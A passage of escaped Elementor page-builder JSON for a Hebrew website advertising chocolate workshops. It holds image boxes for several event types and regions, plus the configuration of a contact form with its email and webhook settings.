\\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"856846f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2c3c21d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ce88b6c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2020\\/01\\/Depositphotos_28018461_s-2019.jpg\",\"id\":585},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea\",\"description_text\":\"\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1? \\u05de\\u05d9\\u05e9\\u05d4\\u05d5 \\u05d9\\u05e7\\u05e8 \\u05dc\\u05dc\\u05d9\\u05d1\\u05db\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2? \\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d9\\u05dd \\u05dc\\u05e9\\u05d3\\u05e8\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2? \\u05db\\u05de\\u05d4 \\u05e4\\u05e2\\u05de\\u05d9\\u05dd \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05dc\\u05db\\u05ea \\u05dc\\u05de\\u05e1\\u05e2\\u05d3\\u05d4 \\u05d8\\u05d5\\u05d1\\u05d4, \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05d4 \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d0\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d9\\u05d5\\u05dd \\u05e4\\u05d9\\u05e0\\u05d5\\u05e7 \\u05d1\\u05e1\\u05e4\\u05d0? \\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05de\\u05e8\\u05d2\\u05d9\\u05e9\\u05d9\\u05dd \\u05e9\\u05e0\\u05d2\\u05de\\u05e8\\u05d5 \\u05dc\\u05db\\u05dd \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05d4\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d9\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05db\\u05dc \\u05d6\\u05d0\\u05ea \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05ea\\u05d9\\u05e2, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"5c6de77\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5c91d59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2020\\/01\\/Depositphotos_83976242_s-2019.jpg\",\"id\":586},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6\",\"description_text\":\"\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6? \\u05d4\\u05d2\\u05e2\\u05ea\\u05dd \\u05dc\\u05de\\u05e7\\u05d5\\u05dd \\u05d4\\u05e0\\u05db\\u05d5\\u05df!\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e8\\u05d1\\u05d5\\u05ea \\u05de\\u05e6\\u05d9\\u05e2\\u05d5\\u05ea \\u05d4\\u05d9\\u05db\\u05e8\\u05d5\\u05ea \\u05de\\u05e2\\u05de\\u05d9\\u05e7\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05e2\\u05dd \\u05e2\\u05d5\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d9\\u05d3\\u05d9 \\u05d4\\u05db\\u05e0\\u05d4 \\u05e9\\u05dc\\u05d5 \\u05ea\\u05d5\\u05da \\u05db\\u05d3\\u05d9 \\u05d4\\u05e1\\u05d1\\u05e8\\u05d9\\u05dd \\u05d5\\u05e1\\u05d9\\u05e4\\u05d5\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05ea\\u05d5\\u05dc\\u05d3\\u05d5\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05db\\u05d3\\u05d9 \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e4\\u05e1\\u05e4\\u05e1\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05d6\\u05d5 \\u05d5\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d2\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd, \\u05d4\\u05db\\u05e0\\u05d5 \\u05dc\\u05db\\u05dd \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d7\\u05d9\\u05d9\\u05d1\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05e8\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"32eca66\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f17b1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e6\\u05e4\\u05d5\\u05df\",\"description_text\":\"\\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e0\\u05d5\\u05e1\\u05e2\\u05d9\\u05dd \\u05dc\\u05e6\\u05e4\\u05d5\\u05df \\u05db\\u05d3\\u05d9 \\u05dc\\u05e0\\u05d5\\u05d7 \\u05d5\\u05dc\\u05d4\\u05d9\\u05e8\\u05d2\\u05e2 \\u05d1\\u05e6\\u05d9\\u05de\\u05e8 \\u05e2\\u05dd \\u05e0\\u05d5\\u05e3 \\u05d5\\u05d2\'\\u05e7\\u05d5\\u05d6\\u05d9 \\u05d5\\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e2\\u05dd \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d8\\u05d9\\u05d5\\u05dc \\u05dc\\u05d8\\u05d9\\u05d5\\u05dc, \\u05db\\u05d3\\u05d0\\u05d9 \\u05dc\\u05db\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d1\\u05d0\\u05e8\\u05e5 \\u05d5\\u05d1\\u05e2\\u05d5\\u05dc\\u05dd \\u2013 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3! \",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9c6d7a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f34fec5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b9e3db9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0e3fa\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2020\\/01\\/Depositphotos_83976242_s-2019.jpg\",\"id\":586},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d3\\u05e8\\u05d5\\u05dd\",\"description_text\":\"\\u05d4\\u05d3\\u05e8\\u05d5\\u05dd \\u05d4\\u05d5\\u05d0 \\u05d4\\u05de\\u05e7\\u05d5\\u05dd \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d8\\u05d9\\u05d5\\u05dc \\u05e9\\u05d9\\u05d8\\u05e2\\u05d9\\u05df \\u05d0\\u05ea\\u05db\\u05dd \\u05d1\\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d5\\u05ea \\u05d7\\u05d3\\u05e9\\u05d5\\u05ea, \\u05e0\\u05d5\\u05e4\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9\\u05dd \\u05d5\\u05d4\\u05de\\u05d5\\u05df \\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d5\\u05ea \\u05de\\u05d2\\u05e0\\u05d9\\u05d1\\u05d5\\u05ea \\u05e9\\u05d0\\u05d9\\u05df \\u05e2\\u05d5\\u05d3 \\u05d1\\u05e9\\u05d5\\u05dd \\u05de\\u05e7\\u05d5\\u05dd \\u05d0\\u05d7\\u05e8. \\u05d0\\u05d7\\u05ea \\u05de\\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d5\\u05ea \\u05d4\\u05d1\\u05d5\\u05dc\\u05d8\\u05d5\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d1\\u05e9\\u05d1\\u05d9\\u05dc\\u05db\\u05dd \\u05e8\\u05d9\\u05db\\u05d6\\u05e0\\u05d5 \\u05db\\u05d0\\u05df \\u05db\\u05de\\u05d4 \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d3\\u05e8\\u05d5\\u05dd \\u05d4\\u05d0\\u05e8\\u05e5 \\u05e9\\u05d5\\u05d5\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05e8\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ec7e837\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"25\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"25\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"field_1\",\"field_type\":\"select\",\"required\":\"true\",\"field_label\":\"\\u05d0\\u05d6\\u05d5\\u05e8\",\"placeholder\":\"\\u05d0\\u05d6\\u05d5\\u05e8 \\u05d1\\u05d0\\u05e8\\u05e5\",\"width\":\"25\",\"_id\":\"9418106\",\"field_options\":\"\\u05de\\u05e8\\u05db\\u05d6\\n\\u05e6\\u05e4\\u05d5\\u05df\\n\\u05d3\\u05e8\\u05d5\\u05dd\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"25\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"yaaripe@gmail.com\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\",\"success_message_color\":\"#ffffff\",\"submit_actions\":[\"email\",\"redirect\",\"webhook\"],\"redirect_to\":\"https:\\/\\/www.chocolate4u.co.il\\/thanks\\/\",\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34415&lm_key=9f1e095b29bf436098e66ca5f1512f34\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c65b0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6b8474\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30c64bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"56c7701\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3.<br \\/><a 